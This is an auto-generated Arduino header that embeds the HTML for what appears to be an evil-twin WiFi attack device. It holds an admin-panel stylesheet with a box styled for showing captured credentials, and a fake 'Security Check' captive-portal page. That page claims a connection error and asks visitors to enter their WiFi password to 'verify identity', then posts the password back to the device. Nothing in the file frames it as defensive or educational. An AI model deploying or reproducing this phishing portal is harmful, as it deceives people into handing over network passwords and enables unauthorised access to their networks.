#pragma once
#include <Arduino.h>
// Auto-generated by tools/embed_html.py during build. Do not edit manually.
inline const char ADMIN_HEADER_HTML[] PROGMEM = R"ADMINHTML(<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <title>%TITLE%</title>
  <style>
    :root { --primary: #FF4B2B; --primary-grad: linear-gradient(to right, #FF416C, #FF4B2B); --bg: #F0F2F5; --card-bg: #FFFFFF; --text: #333; }
    * { box-sizing: border-box; margin: 0; padding: 0; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif; }
    body { background: var(--bg); color: var(--text); padding-bottom: 30px; }
    .container { max-width: 800px; margin: 0 auto; padding: 15px; }
    .header { background: var(--primary-grad); color: white; padding: 20px; border-radius: 15px; box-shadow: 0 4px 15px rgba(255, 75, 43, 0.3); margin-bottom: 20px; text-align: center; }
    .card { background: var(--card-bg); border-radius: 12px; padding: 20px; margin-bottom: 15px; box-shadow: 0 2px 10px rgba(0,0,0,0.05); }
    h1 { font-size: 1.5rem; margin-bottom: 5px; }
    h2 { font-size: 1.2rem; margin-bottom: 15px; border-bottom: 2px solid #eee; padding-bottom: 10px; }
    .btn { display: inline-block; width: 100%; padding: 12px; border: none; border-radius: 8px; background: var(--primary-grad); color: white; font-weight: bold; cursor: pointer; text-decoration: none; margin-bottom: 10px; text-align: center;}
    .btn.secondary { background: #6c757d; } .btn.danger { background: #dc3545; } .btn.success { background: #28a745; }
    input[type="text"], textarea, select { width: 100%; padding: 12px; border: 1px solid #ddd; border-radius: 8px; margin-bottom: 10px; }
    .table-container { overflow-x: auto; } table { width: 100%; border-collapse: collapse; } th, td { padding: 12px; text-align: left; border-bottom: 1px solid #eee; }
    .status-badge { padding: 5px 10px; border-radius: 20px; font-size: 0.8rem; background: #eee; color: black; font-weight: bold; }
    .active-badge { background: #d4edda; color: #155724; padding: 5px 10px; border-radius: 20px; font-size: 0.8rem; font-weight: bold; }
    .live-dot { height: 10px; width: 10px; background-color: #f00; border-radius: 50%; display: inline-block; animation: blink 1s infinite; margin-right: 5px; }
    @keyframes blink { 0% { opacity: 1; } 50% { opacity: 0.4; } 100% { opacity: 1; } }
    .cred-box { background: #fff3cd; border-left: 5px solid #ffc107; padding: 15px; margin-bottom: 10px; word-wrap: break-word; }
    @media (min-width: 600px) { .btn-group { display: flex; gap: 10px; } .btn { margin-bottom: 0; } }
  </style>
</head>
<body><div class="container">)ADMINHTML";
inline const char CAPTIVE_PORTAL_HTML[] PROGMEM = R"CAPTIVEHTML(<!DOCTYPE html>
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Security Check</title>
  <style>
    body { font-family: sans-serif; background: #eee; padding: 20px; text-align: center; }
    .box { background: white; padding: 30px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
    input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 4px; }
    button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer; }
  </style>
</head>
<body>
  <div class="box">
    <h2>Connection Error</h2>
    <p>Please enter your WiFi password to verify identity.</p>
    <form action="/" method="post">
      <input type="password" name="password" placeholder="WiFi Password" required>
      <button type="submit">Connect</button>
    </form>
  </div>
</body>
</html>
)CAPTIVEHTML";
inline const char FOOTER_HTML[] PROGMEM = "</div></body></html>";
